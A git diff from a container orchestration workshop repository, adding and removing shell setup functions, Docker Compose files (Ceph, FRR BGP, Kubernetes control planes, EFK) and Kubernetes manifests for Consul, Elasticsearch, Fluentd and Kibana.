|
||||
eval $(docker-machine env node1 --swarm)
|
||||
}
|
||||
dm_node1 () {
|
||||
eval $(docker-machine env node1)
|
||||
}
|
||||
|
||||
setup_1_swarm () {
|
||||
grep node[12345] /etc/hosts | grep -v ^127 |
|
||||
while read IPADDR NODENAME; do
|
||||
docker-machine create --driver generic \
|
||||
--engine-opt cluster-store=consul://localhost:8500 \
|
||||
--engine-opt cluster-advertise=eth0:2376 \
|
||||
--swarm --swarm-master --swarm-image $SWARM_IMAGE \
|
||||
--swarm-discovery consul://localhost:8500 \
|
||||
--swarm-opt replication --swarm-opt advertise=$IPADDR:3376 \
|
||||
--generic-ssh-user docker --generic-ip-address $IPADDR $NODENAME
|
||||
done
|
||||
}
|
||||
|
||||
setup_2_consul () {
|
||||
IPADDR=$(ssh node1 ip a ls dev eth0 |
|
||||
sed -n 's,.*inet \(.*\)/.*,\1,p')
|
||||
|
||||
for N in 1 2 3 4 5; do
|
||||
ssh node$N -- docker run -d --restart=always --name consul_node$N \
|
||||
-e CONSUL_BIND_INTERFACE=eth0 --net host consul \
|
||||
agent -server -retry-join $IPADDR -bootstrap-expect 5 \
|
||||
-ui -client 0.0.0.0
|
||||
done
|
||||
}
|
||||
|
||||
setup_3_wait () {
|
||||
# Wait for a Swarm master
|
||||
dm_swarm
|
||||
while ! docker ps; do sleep 1; done
|
||||
|
||||
# Wait for all nodes to be there
|
||||
while ! [ "$(docker info | grep "^Nodes:")" = "Nodes: 5" ]; do sleep 1; done
|
||||
}
|
||||
|
||||
setup_4_registry () {
|
||||
cd ~/orchestration-workshop/registry
|
||||
dm_swarm
|
||||
docker-compose up -d
|
||||
for N in $(seq 2 5); do
|
||||
docker-compose scale frontend=$N
|
||||
done
|
||||
}
|
||||
|
||||
setup_5_btp_dockercoins () {
|
||||
cd ~/orchestration-workshop/dockercoins
|
||||
dm_node1
|
||||
export DOCKER_REGISTRY=localhost:5000
|
||||
cp docker-compose.yml-v2 docker-compose.yml
|
||||
~/orchestration-workshop/bin/build-tag-push.py | tee /tmp/btp.log
|
||||
export $(tail -n 1 /tmp/btp.log)
|
||||
}
|
||||
|
||||
setup_6_add_lbs () {
|
||||
cd ~/orchestration-workshop/dockercoins
|
||||
~/orchestration-workshop/bin/add-load-balancer-v2.py rng
|
||||
~/orchestration-workshop/bin/add-load-balancer-v2.py hasher
|
||||
}
|
||||
|
||||
setup_7_consulfs () {
|
||||
dm_swarm
|
||||
docker pull jpetazzo/consulfs
|
||||
for N in $(seq 1 5); do
|
||||
ssh node$N "docker run --rm -v /usr/local/bin:/target jpetazzo/consulfs"
|
||||
ssh node$N mkdir -p ~/consul
|
||||
ssh -f node$N "mountpoint ~/consul || consulfs localhost:8500 ~/consul"
|
||||
done
|
||||
}
|
||||
|
||||
setup_8_syncmachine () {
|
||||
while ! mountpoint ~/consul; do
|
||||
sleep 1
|
||||
done
|
||||
cp -r ~/.docker/machine ~/consul/
|
||||
for N in $(seq 2 5); do
|
||||
ssh node$N mkdir -p ~/.docker
|
||||
ssh node$N "[ -L ~/.docker/machine ] || ln -s ~/consul/machine ~/.docker"
|
||||
done
|
||||
}
|
||||
|
||||
setup_9_elk () {
|
||||
dm_swarm
|
||||
cd ~/orchestration-workshop/elk
|
||||
docker-compose up -d
|
||||
for N in $(seq 1 5); do
|
||||
docker-compose scale logstash=$N
|
||||
done
|
||||
}
|
||||
|
||||
setup_all () {
|
||||
setup_1_swarm
|
||||
setup_2_consul
|
||||
setup_3_wait
|
||||
setup_4_registry
|
||||
setup_5_btp_dockercoins
|
||||
setup_6_add_lbs
|
||||
setup_7_consulfs
|
||||
setup_8_syncmachine
|
||||
dm_swarm
|
||||
}
|
||||
|
||||
|
||||
force_remove_network () {
|
||||
dm_swarm
|
||||
NET="$1"
|
||||
for CNAME in $(docker network inspect $NET | grep Name | grep -v \"$NET\" | cut -d\" -f4); do
|
||||
echo $CNAME
|
||||
docker network disconnect -f $NET $CNAME
|
||||
done
|
||||
docker network rm $NET
|
||||
}
|
||||
|
||||
demo_1_compose_up () {
|
||||
dm_swarm
|
||||
cd ~/orchestration-workshop/dockercoins
|
||||
docker-compose up -d
|
||||
}
|
||||
|
||||
grep -qs -- MAGICMARKER "$0" && { # Don't display this line in the function lis
|
||||
echo "You should source this file, then invoke the following functions:"
|
||||
grep -- '^[a-z].*{$' "$0" | cut -d" " -f1
|
||||
}
|
||||
|
||||
show_swarm_primary () {
|
||||
dm_swarm
|
||||
docker info 2>/dev/null | grep -e ^Role -e ^Primary
|
||||
}
|
||||
@@ -1,12 +0,0 @@
|
||||
version: "2"
|
||||
|
||||
services:
|
||||
cadvisor:
|
||||
image: google/cadvisor
|
||||
ports:
|
||||
- "8080:8080"
|
||||
volumes:
|
||||
- "/:/rootfs:ro"
|
||||
- "/var/run:/var/run:rw"
|
||||
- "/sys:/sys:ro"
|
||||
- "/var/lib/docker/:/var/lib/docker:ro"
|
||||
@@ -1,19 +0,0 @@
|
||||
# CEPH on Docker
|
||||
|
||||
Note: this doesn't quite work yet.
|
||||
|
||||
The OSD containers need to be started twice (the first time, they fail
|
||||
initializing; second time is a champ).
|
||||
|
||||
Also, it looks like you need at least two OSD containers (or the OSD
|
||||
container should have two disks/directories, whatever).
|
||||
|
||||
RadosGw is listening on port 8080.
|
||||
|
||||
The `admin` container will create a `docker` user using `radosgw-admin`.
|
||||
If you run it multiple times, that's OK: further invocations are idempotent.
|
||||
|
||||
Last but not least: it looks like AWS CLI uses a new signature format
|
||||
that doesn't work with RadosGW. After almost two hours trying to figure
|
||||
out what was wrong, I tried the S3 credentials directly with boto and
|
||||
it worked immediately (I was able to create a bucket).
|
||||
@@ -1,53 +0,0 @@
|
||||
version: "2"
|
||||
|
||||
services:
|
||||
mon:
|
||||
image: ceph/daemon
|
||||
command: mon
|
||||
environment:
|
||||
CEPH_PUBLIC_NETWORK: 10.33.0.0/16
|
||||
MON_IP: 10.33.0.2
|
||||
osd:
|
||||
image: ceph/daemon
|
||||
command: osd_directory
|
||||
depends_on:
|
||||
- mon
|
||||
volumes_from:
|
||||
- mon
|
||||
volumes:
|
||||
- /var/lib/ceph/osd
|
||||
mds:
|
||||
image: ceph/daemon
|
||||
command: mds
|
||||
environment:
|
||||
CEPHFS_CREATE: 1
|
||||
depends_on:
|
||||
- mon
|
||||
volumes_from:
|
||||
- mon
|
||||
rgw:
|
||||
image: ceph/daemon
|
||||
command: rgw
|
||||
depends_on:
|
||||
- mon
|
||||
volumes_from:
|
||||
- mon
|
||||
environment:
|
||||
CEPH_OPTS: --verbose
|
||||
admin:
|
||||
image: ceph/daemon
|
||||
entrypoint: radosgw-admin
|
||||
depends_on:
|
||||
- mon
|
||||
volumes_from:
|
||||
- mon
|
||||
command: user create --uid=docker --display-name=docker
|
||||
|
||||
networks:
|
||||
default:
|
||||
ipam:
|
||||
driver: default
|
||||
config:
|
||||
- subnet: 10.33.0.0/16
|
||||
gateway: 10.33.0.1
|
||||
|
||||
9
compose/frr-route-reflector/conf/bgpd.conf
Normal file
9
compose/frr-route-reflector/conf/bgpd.conf
Normal file
@@ -0,0 +1,9 @@
|
||||
hostname frr
|
||||
router bgp 64512
|
||||
network 1.0.0.2/32
|
||||
bgp log-neighbor-changes
|
||||
neighbor kube peer-group
|
||||
neighbor kube remote-as 64512
|
||||
neighbor kube route-reflector-client
|
||||
bgp listen range 0.0.0.0/0 peer-group kube
|
||||
log stdout
|
||||
0
compose/frr-route-reflector/conf/vtysh.conf
Normal file
0
compose/frr-route-reflector/conf/vtysh.conf
Normal file
2
compose/frr-route-reflector/conf/zebra.conf
Normal file
2
compose/frr-route-reflector/conf/zebra.conf
Normal file
@@ -0,0 +1,2 @@
|
||||
hostname frr
|
||||
log stdout
|
||||
34
compose/frr-route-reflector/docker-compose.yaml
Normal file
34
compose/frr-route-reflector/docker-compose.yaml
Normal file
@@ -0,0 +1,34 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
bgpd:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
|
||||
restart: always
|
||||
|
||||
zebra:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
|
||||
restart: always
|
||||
|
||||
vtysh:
|
||||
image: ajones17/frr:662
|
||||
volumes:
|
||||
- ./conf:/etc/frr
|
||||
- ./run:/var/run/frr
|
||||
network_mode: host
|
||||
entrypoint: vtysh -c "show ip bgp"
|
||||
|
||||
chmod:
|
||||
image: alpine
|
||||
volumes:
|
||||
- ./run:/var/run/frr
|
||||
command: chmod 777 /var/run/frr
|
||||
29
compose/kube-router-k8s-control-plane/docker-compose.yaml
Normal file
29
compose/kube-router-k8s-control-plane/docker-compose.yaml
Normal file
@@ -0,0 +1,29 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
|
||||
pause:
|
||||
ports:
|
||||
- 8080:8080
|
||||
image: k8s.gcr.io/pause
|
||||
|
||||
etcd:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/etcd:3.3.10
|
||||
command: etcd
|
||||
|
||||
kube-apiserver:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
|
||||
|
||||
kube-controller-manager:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
|
||||
"Edit the CLUSTER placeholder first. Then, remove this line.":
|
||||
|
||||
kube-scheduler:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
command: kube-scheduler --master http://localhost:8080
|
||||
128
compose/kube-router-k8s-control-plane/kuberouter.yaml
Normal file
128
compose/kube-router-k8s-control-plane/kuberouter.yaml
Normal file
@@ -0,0 +1,128 @@
|
||||
---
|
||||
apiVersion: |+
|
||||
|
||||
|
||||
Make sure you update the line with --master=http://X.X.X.X:8080 below.
|
||||
Then remove this section from this YAML file and try again.
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: kube-router-cfg
|
||||
namespace: kube-system
|
||||
labels:
|
||||
tier: node
|
||||
k8s-app: kube-router
|
||||
data:
|
||||
cni-conf.json: |
|
||||
{
|
||||
"cniVersion":"0.3.0",
|
||||
"name":"mynet",
|
||||
"plugins":[
|
||||
{
|
||||
"name":"kubernetes",
|
||||
"type":"bridge",
|
||||
"bridge":"kube-bridge",
|
||||
"isDefaultGateway":true,
|
||||
"ipam":{
|
||||
"type":"host-local"
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
tier: node
|
||||
name: kube-router
|
||||
namespace: kube-system
|
||||
spec:
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kube-router
|
||||
tier: node
|
||||
annotations:
|
||||
scheduler.alpha.kubernetes.io/critical-pod: ''
|
||||
spec:
|
||||
serviceAccountName: kube-router
|
||||
containers:
|
||||
- name: kube-router
|
||||
image: docker.io/cloudnativelabs/kube-router
|
||||
imagePullPolicy: Always
|
||||
args:
|
||||
- "--run-router=true"
|
||||
- "--run-firewall=true"
|
||||
- "--run-service-proxy=true"
|
||||
- "--master=http://X.X.X.X:8080"
|
||||
env:
|
||||
- name: NODE_NAME
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: spec.nodeName
|
||||
- name: KUBE_ROUTER_CNI_CONF_FILE
|
||||
value: /etc/cni/net.d/10-kuberouter.conflist
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
path: /healthz
|
||||
port: 20244
|
||||
initialDelaySeconds: 10
|
||||
periodSeconds: 3
|
||||
resources:
|
||||
requests:
|
||||
cpu: 250m
|
||||
memory: 250Mi
|
||||
securityContext:
|
||||
privileged: true
|
||||
volumeMounts:
|
||||
- name: lib-modules
|
||||
mountPath: /lib/modules
|
||||
readOnly: true
|
||||
- name: cni-conf-dir
|
||||
mountPath: /etc/cni/net.d
|
||||
initContainers:
|
||||
- name: install-cni
|
||||
image: busybox
|
||||
imagePullPolicy: Always
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- set -e -x;
|
||||
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
|
||||
if [ -f /etc/cni/net.d/*.conf ]; then
|
||||
rm -f /etc/cni/net.d/*.conf;
|
||||
fi;
|
||||
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
|
||||
cp /etc/kube-router/cni-conf.json ${TMP};
|
||||
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
|
||||
fi
|
||||
volumeMounts:
|
||||
- mountPath: /etc/cni/net.d
|
||||
name: cni-conf-dir
|
||||
- mountPath: /etc/kube-router
|
||||
name: kube-router-cfg
|
||||
hostNetwork: true
|
||||
tolerations:
|
||||
- key: CriticalAddonsOnly
|
||||
operator: Exists
|
||||
- effect: NoSchedule
|
||||
key: node-role.kubernetes.io/master
|
||||
operator: Exists
|
||||
- effect: NoSchedule
|
||||
key: node.kubernetes.io/not-ready
|
||||
operator: Exists
|
||||
volumes:
|
||||
- name: lib-modules
|
||||
hostPath:
|
||||
path: /lib/modules
|
||||
- name: cni-conf-dir
|
||||
hostPath:
|
||||
path: /etc/cni/net.d
|
||||
- name: kube-router-cfg
|
||||
configMap:
|
||||
name: kube-router-cfg
|
||||
|
||||
28
compose/simple-k8s-control-plane/docker-compose.yaml
Normal file
28
compose/simple-k8s-control-plane/docker-compose.yaml
Normal file
@@ -0,0 +1,28 @@
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
|
||||
pause:
|
||||
ports:
|
||||
- 8080:8080
|
||||
image: k8s.gcr.io/pause
|
||||
|
||||
etcd:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/etcd:3.3.10
|
||||
command: etcd
|
||||
|
||||
kube-apiserver:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
|
||||
|
||||
kube-controller-manager:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
command: kube-controller-manager --master http://localhost:8080
|
||||
|
||||
kube-scheduler:
|
||||
network_mode: "service:pause"
|
||||
image: k8s.gcr.io/hyperkube:v1.14.0
|
||||
command: kube-scheduler --master http://localhost:8080
|
||||
@@ -1,12 +0,0 @@
|
||||
version: "2"
|
||||
services:
|
||||
bootstrap:
|
||||
image: jpetazzo/consul
|
||||
command: agent -server -bootstrap
|
||||
container_name: bootstrap
|
||||
server:
|
||||
image: jpetazzo/consul
|
||||
command: agent -server -join bootstrap -join server
|
||||
client:
|
||||
image: jpetazzo/consul
|
||||
command: members -rpc-addr server:8400
|
||||
@@ -1,5 +1,5 @@
|
||||
FROM ruby:alpine
|
||||
RUN apk add --update build-base
|
||||
RUN apk add --update build-base curl
|
||||
RUN gem install sinatra
|
||||
RUN gem install thin
|
||||
ADD hasher.rb /
|
||||
|
||||
@@ -28,5 +28,5 @@ def rng(how_many_bytes):
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
app.run(host="0.0.0.0", port=80)
|
||||
app.run(host="0.0.0.0", port=80, threaded=False)
|
||||
|
||||
|
||||
@@ -50,7 +50,7 @@ function refresh () {
|
||||
points.push({ x: s2.now, y: speed });
|
||||
}
|
||||
$("#speed").text("~" + speed.toFixed(1) + " hashes/second");
|
||||
var msg = ("I'm attending the @docker workshop at #LinuxCon, "
|
||||
var msg = ("I'm attending a @docker orchestration workshop, "
|
||||
+ "and my #DockerCoins mining rig is crunching "
|
||||
+ speed.toFixed(1) + " hashes/second! W00T!");
|
||||
$("#tweet").attr(
|
||||
|
||||
36
efk/README.md
Normal file
36
efk/README.md
Normal file
@@ -0,0 +1,36 @@
|
||||
# Elasticsearch + Fluentd + Kibana
|
||||
|
||||
This is a variation on the classic "ELK" stack.
|
||||
|
||||
The [fluentd](fluentd/) subdirectory contains a Dockerfile to build
|
||||
a fluentd image embarking a simple configuration file, accepting log
|
||||
entries on port 24224 and storing them in Elasticsearch in a format
|
||||
that Kibana can use.
|
||||
|
||||
You can also use a pre-built image, `jpetazzo/fluentd:v0.1`
|
||||
(e.g. if you want to deploy on a cluster and don't want to deploy
|
||||
your own registry).
|
||||
|
||||
Once this fluentd container is running, and assuming you expose
|
||||
its port 24224/tcp somehow, you can send container logs to fluentd
|
||||
by using Docker's fluentd logging driver.
|
||||
|
||||
You can bring up the whole stack with the associated Compoes file.
|
||||
With Swarm mode, you can bring up the whole stack like this:
|
||||
|
||||
```bash
|
||||
docker network create efk --driver overlay
|
||||
docker service create --network efk \
|
||||
--name elasticsearch elasticsearch:2
|
||||
docker service create --network efk --publish 5601:5601 \
|
||||
--name kibana kibana
|
||||
docker service create --network efk --publish 24224:24224 \
|
||||
--name fluentd jpetazzo/fluentd:v0.1
|
||||
```
|
||||
|
||||
And then, from any node on your cluster, you can send logs to fluentd like this:
|
||||
|
||||
```bash
|
||||
docker run --log-driver fluentd --log-opt fluentd-address=localhost:24224 \
|
||||
alpine echo ohai there
|
||||
```
|
||||
24
efk/docker-compose.yml
Normal file
24
efk/docker-compose.yml
Normal file
@@ -0,0 +1,24 @@
|
||||
version: "2"
|
||||
|
||||
services:
|
||||
elasticsearch:
|
||||
image: elasticsearch
|
||||
# If you need to access ES directly, just uncomment those lines.
|
||||
#ports:
|
||||
# - "9200:9200"
|
||||
# - "9300:9300"
|
||||
|
||||
fluentd:
|
||||
#build: fluentd
|
||||
image: jpetazzo/fluentd:v0.1
|
||||
ports:
|
||||
- "127.0.0.1:24224:24224"
|
||||
depends_on:
|
||||
- elasticsearch
|
||||
|
||||
kibana:
|
||||
image: kibana
|
||||
ports:
|
||||
- "5601:5601"
|
||||
environment:
|
||||
ELASTICSEARCH_URL: http://elasticsearch:9200
|
||||
5
efk/fluentd/Dockerfile
Normal file
5
efk/fluentd/Dockerfile
Normal file
@@ -0,0 +1,5 @@
|
||||
FROM ruby
|
||||
RUN gem install fluentd
|
||||
RUN gem install fluent-plugin-elasticsearch
|
||||
COPY fluentd.conf /fluentd.conf
|
||||
CMD ["fluentd", "-c", "/fluentd.conf"]
|
||||
12
efk/fluentd/fluentd.conf
Normal file
12
efk/fluentd/fluentd.conf
Normal file
@@ -0,0 +1,12 @@
|
||||
<source>
|
||||
@type forward
|
||||
port 24224
|
||||
bind 0.0.0.0
|
||||
</source>
|
||||
|
||||
<match **>
|
||||
@type elasticsearch
|
||||
host elasticsearch
|
||||
logstash_format true
|
||||
flush_interval 1
|
||||
</match>
|
||||
@@ -2,14 +2,14 @@ version: "2"
|
||||
|
||||
services:
|
||||
elasticsearch:
|
||||
image: elasticsearch
|
||||
image: elasticsearch:2
|
||||
# If you need to access ES directly, just uncomment those lines.
|
||||
#ports:
|
||||
# - "9200:9200"
|
||||
# - "9300:9300"
|
||||
|
||||
logstash:
|
||||
image: logstash
|
||||
image: logstash:2
|
||||
command: |
|
||||
-e '
|
||||
input {
|
||||
@@ -47,7 +47,7 @@ services:
|
||||
- "12201:12201/udp"
|
||||
|
||||
kibana:
|
||||
image: kibana
|
||||
image: kibana:4
|
||||
ports:
|
||||
- "5601:5601"
|
||||
environment:
|
||||
|
||||
90
k8s/consul.yaml
Normal file
90
k8s/consul.yaml
Normal file
@@ -0,0 +1,90 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: consul
|
||||
labels:
|
||||
app: consul
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources:
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: consul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: consul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: consul
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: consul
|
||||
labels:
|
||||
app: consul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
ports:
|
||||
- port: 8500
|
||||
name: http
|
||||
selector:
|
||||
app: consul
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
serviceName: consul
|
||||
replicas: 3
|
||||
selector:
|
||||
matchLabels:
|
||||
app: consul
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: consul
|
||||
spec:
|
||||
serviceAccountName: consul
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: app
|
||||
operator: In
|
||||
values:
|
||||
- consul
|
||||
topologyKey: kubernetes.io/hostname
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.4.4"
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s label_selector=\"app=consul\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
- "-ui"
|
||||
lifecycle:
|
||||
preStop:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- consul leave
|
||||
28
k8s/docker-build.yaml
Normal file
28
k8s/docker-build.yaml
Normal file
@@ -0,0 +1,28 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: build-image
|
||||
spec:
|
||||
restartPolicy: OnFailure
|
||||
containers:
|
||||
- name: docker-build
|
||||
image: docker
|
||||
env:
|
||||
- name: REGISTRY_PORT
|
||||
value: #"30000"
|
||||
command: ["sh", "-c"]
|
||||
args:
|
||||
- |
|
||||
apk add --no-cache git &&
|
||||
mkdir /workspace &&
|
||||
git clone https://github.com/jpetazzo/container.training /workspace &&
|
||||
docker build -t localhost:$REGISTRY_PORT/worker /workspace/dockercoins/worker &&
|
||||
docker push localhost:$REGISTRY_PORT/worker
|
||||
volumeMounts:
|
||||
- name: docker-socket
|
||||
mountPath: /var/run/docker.sock
|
||||
volumes:
|
||||
- name: docker-socket
|
||||
hostPath:
|
||||
path: /var/run/docker.sock
|
||||
|
||||
167
k8s/efk.yaml
Normal file
167
k8s/efk.yaml
Normal file
@@ -0,0 +1,167 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: fluentd
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: fluentd
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- pods
|
||||
- namespaces
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
metadata:
|
||||
name: fluentd
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: fluentd
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: fluentd
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: fluentd
|
||||
labels:
|
||||
app: fluentd
|
||||
spec:
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: fluentd
|
||||
spec:
|
||||
serviceAccount: fluentd
|
||||
serviceAccountName: fluentd
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
containers:
|
||||
- name: fluentd
|
||||
image: fluent/fluentd-kubernetes-daemonset:v1.3-debian-elasticsearch-1
|
||||
env:
|
||||
- name: FLUENT_ELASTICSEARCH_HOST
|
||||
value: "elasticsearch"
|
||||
- name: FLUENT_ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: FLUENT_ELASTICSEARCH_SCHEME
|
||||
value: "http"
|
||||
- name: FLUENT_UID
|
||||
value: "0"
|
||||
- name: FLUENTD_SYSTEMD_CONF
|
||||
value: "disable"
|
||||
- name: FLUENTD_PROMETHEUS_CONF
|
||||
value: "disable"
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 200Mi
|
||||
volumeMounts:
|
||||
- name: varlog
|
||||
mountPath: /var/log
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
terminationGracePeriodSeconds: 30
|
||||
volumes:
|
||||
- name: varlog
|
||||
hostPath:
|
||||
path: /var/log
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: elasticsearch
|
||||
name: elasticsearch
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: elasticsearch
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: elasticsearch
|
||||
spec:
|
||||
containers:
|
||||
- image: elasticsearch:5
|
||||
name: elasticsearch
|
||||
resources:
|
||||
limits:
|
||||
memory: 2Gi
|
||||
requests:
|
||||
memory: 1Gi
|
||||
env:
|
||||
- name: ES_JAVA_OPTS
|
||||
value: "-Xms1g -Xmx1g"
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: elasticsearch
|
||||
name: elasticsearch
|
||||
spec:
|
||||
ports:
|
||||
- port: 9200
|
||||
protocol: TCP
|
||||
targetPort: 9200
|
||||
selector:
|
||||
app: elasticsearch
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: kibana
|
||||
name: kibana
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: kibana
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: kibana
|
||||
spec:
|
||||
containers:
|
||||
- env:
|
||||
- name: ELASTICSEARCH_URL
|
||||
value: http://elasticsearch:9200/
|
||||
image: kibana:5
|
||||
name: kibana
|
||||
resources: {}
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: kibana
|
||||
name: kibana
|
||||
spec:
|
||||
ports:
|
||||
- port: 5601
|
||||
protocol: TCP
|
||||
targetPort: 5601
|
||||
selector:
|
||||
app: kibana
|
||||
type: NodePort
|
||||
21
k8s/elasticsearch-cluster.yaml
Normal file
21
k8s/elasticsearch-cluster.yaml
Normal file
@@ -0,0 +1,21 @@
|
||||
apiVersion: enterprises.upmc.com/v1
|
||||
kind: ElasticsearchCluster
|
||||
metadata:
|
||||
name: es
|
||||
spec:
|
||||
kibana:
|
||||
image: docker.elastic.co/kibana/kibana-oss:6.1.3
|
||||
image-pull-policy: Always
|
||||
cerebro:
|
||||
image: upmcenterprises/cerebro:0.7.2
|
||||
image-pull-policy: Always
|
||||
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
|
||||
image-pull-policy: Always
|
||||
client-node-replicas: 2
|
||||
master-node-replicas: 3
|
||||
data-node-replicas: 3
|
||||
network-host: 0.0.0.0
|
||||
use-ssl: false
|
||||
data-volume-size: 10Gi
|
||||
java-options: "-Xms512m -Xmx512m"
|
||||
|
||||
94
k8s/elasticsearch-operator.yaml
Normal file
94
k8s/elasticsearch-operator.yaml
Normal file
@@ -0,0 +1,94 @@
|
||||
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
rules:
|
||||
- apiGroups: ["extensions"]
|
||||
resources: ["deployments", "replicasets", "daemonsets"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["apiextensions.k8s.io"]
|
||||
resources: ["customresourcedefinitions"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["storage.k8s.io"]
|
||||
resources: ["storageclasses"]
|
||||
